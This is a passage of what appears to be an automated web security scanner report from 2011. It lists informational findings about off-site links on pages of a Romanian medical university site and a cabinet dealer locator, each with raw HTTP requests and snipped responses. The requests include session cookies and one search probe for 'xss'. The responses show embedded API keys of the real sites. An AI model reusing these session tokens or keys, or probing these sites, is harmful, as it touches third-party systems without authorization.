<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<p>
        <a target="_blank" href="http://www.osmcluj.ro">www.osmcluj.ro<br />
...[SNIP]...
<li><a target="_blank" href="http://cazari.umfcluj.ro/">Pr&eacute;logement</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.49. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=Studenti-actuali-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:10 GMT
Content-Length: 82847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li><a href="http://www.umfcluj.ro/Document_Files/Rectorat-Date-de-contact/00000066/gik54_Structura%20anului%20universitar%202010-2011.pdf">Structura an universitar </a>
...[SNIP]...
<li><a href="http://cazari.umfcluj.ro/">Precazare</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.50. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=Biblioteca-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:19 GMT
Content-Length: 66728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<li><a target="_blank" href="http://www.liberty3.umfcluj.ro/liberty3">Catalogue en ligne</a>
...[SNIP]...
<li><a target="_blank" href="http://www.tdnet.com/umf">Liste alphab&eacute;tique cherchable des revues et des livres en ligne - TDNet</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/cx8yx_sectia franceza.pdf">Liste des livres pour les &eacute;tudiants de la Section Fran&ccedil;aise</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/dfbr3_carti_referinta.pdf">Collection r&eacute;f&eacute;rence (livres disponible au 3e &eacute;tage)</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ncbi.nlm.nih.gov/pubmed/">PubMed </a>
...[SNIP]...
<li><a target="_blank" href="http://online6.edqm.eu/ep701/">Pharmacop&eacute;e Europ&eacute;enne 7&egrave;me &eacute;dition</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/c1qpo_articole_expres-fr.doc">Articles sur demande</a>
...[SNIP]...
<li>Acc&egrave;s temporaire &agrave; la collection de livres &eacute;lectroniques de <a target="_blank" href="http://www.booksonline.iospress.nl/Default.aspx">IOS Press&nbsp;</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Detaliu.aspx?t=Biblioteca-Nou-in-biblioteca&amp;eID=141&amp;c=0&amp;m=0&amp;y=0">Livres nouveaux re&ccedil;us en mai 2011 </a>
...[SNIP]...
<li><a target="_blank" href="http://www.john-libbey-eurotext.fr/fr/revues/medecine/index.phtml">Revues John Libbey Eurotext par abonnement de l'AUF</a>
...[SNIP]...
<li><a target="_blank" href="http://www.fascicules.fr/polycopies-accueil-0.html">Polycopi&eacute;s nationaux des Coll&egrave;ges des Enseignants - Cours en Ligne de M&eacute;decine (texte integral)</a>
...[SNIP]...
<li><a target="_blank" href="http://hstalks.com/main/index_category.php?id=252&amp;">Biomedical &amp; Life Sciences Collection</a>
...[SNIP]...
<li><a target="_blank" href="http://granturi.ubbcluj.ro/autodidact/services.html">Livres et outils en ligne pour apprendre le roumain ou d'autres langues</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ms.ro/?pag=181">Guides de pratique&nbsp;m&eacute;dicale - Minist&egrave;re de la Sant&eacute; (en roumain)</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.51. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=International-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:46:00 GMT
Content-Length: 64369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<br />
<a href="http://www.umfcluj.ro/Document_Files/Noutati/00000289/myvrj_Admission%202011%20(%20EN).pdf">http://www.umfcluj.ro/Document_Files/Noutati/00000289/1cadk_Admission%202011%20(%20FR%20).pdf</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.52. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lista.aspx?t=Doctorat-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.4.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:14 GMT
Content-Length: 84035


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<br />
<a href="http://www.umfcluj.ro/Detaliu.aspx?t=Doctorat-Date-de-contact">Mai multe detalii</a>
...[SNIP]...
</ul>
<a href="http://www.umfcluj.ro/lista.aspx?t=DoctoratBiroudeConsiliereCariera">Mai multe detalii...</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.53. http://umfcluj.ro/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.aspx?caut=xss HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/css/search.css" />
<script src="http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA" type="text/javascript"></script>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class="active"><a class="active" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">
                                       
                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&amp;eID=289&amp;c=0&amp;m=0&amp;y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.54. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /locate-dealer?zip=10010 HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4; has_js=1; __utma=150814896.783126044.1311108308.1311108308.1311108308.1; __utmb=150814896.2.9.1311108318174; __utmc=150814896; __utmz=150814896.1311108308.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<br /><a href='http://www.builtritecc.com' title='Visit this dealer online'>http://www.builtritecc.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=15-30+131st+St+College+Point+NY%2C+11356'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.thecabinetfactory.com' title='Visit this dealer online'>http://www.thecabinetfactory.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=7419+13th+Ave+Brooklyn+NY%2C+11228'>Get directions</a>
...[SNIP]...
<br /><a href='http://maps.google.com/maps?saddr=&daddr=94-37+Rockaway+Blvd+Ozone+Park+NY%2C+11417'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.bhhomeexpo.com' title='Visit this dealer online'>http://www.bhhomeexpo.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=7307+Main+St+Flushing+NY%2C+11367'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.emescabinets.com/' title='Visit this dealer online'>http://www.emescabinets.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=166+Main+Street+Passaic+NJ%2C+07055'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kabinetking.com/' title='Visit this dealer online'>http://www.kabinetking.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=211-36+Hillside+Ave+Queens+Village+NY%2C+11427'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.kitchensbypaul.com/' title='Visit this dealer online'>http://www.kitchensbypaul.com/</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=110+Route+46+East+Saddle+Brook+NJ%2C+07663'>Get directions</a>
...[SNIP]...
<br /><a href='http://www.thecabinetfactory.com' title='Visit this dealer online'>http://www.thecabinetfactory.com</a><br /><a href='http://maps.google.com/maps?saddr=&daddr=2333+Hylan+Blvd+Staten+Island+NY%2C+10305'>Get directions</a>
...[SNIP]...
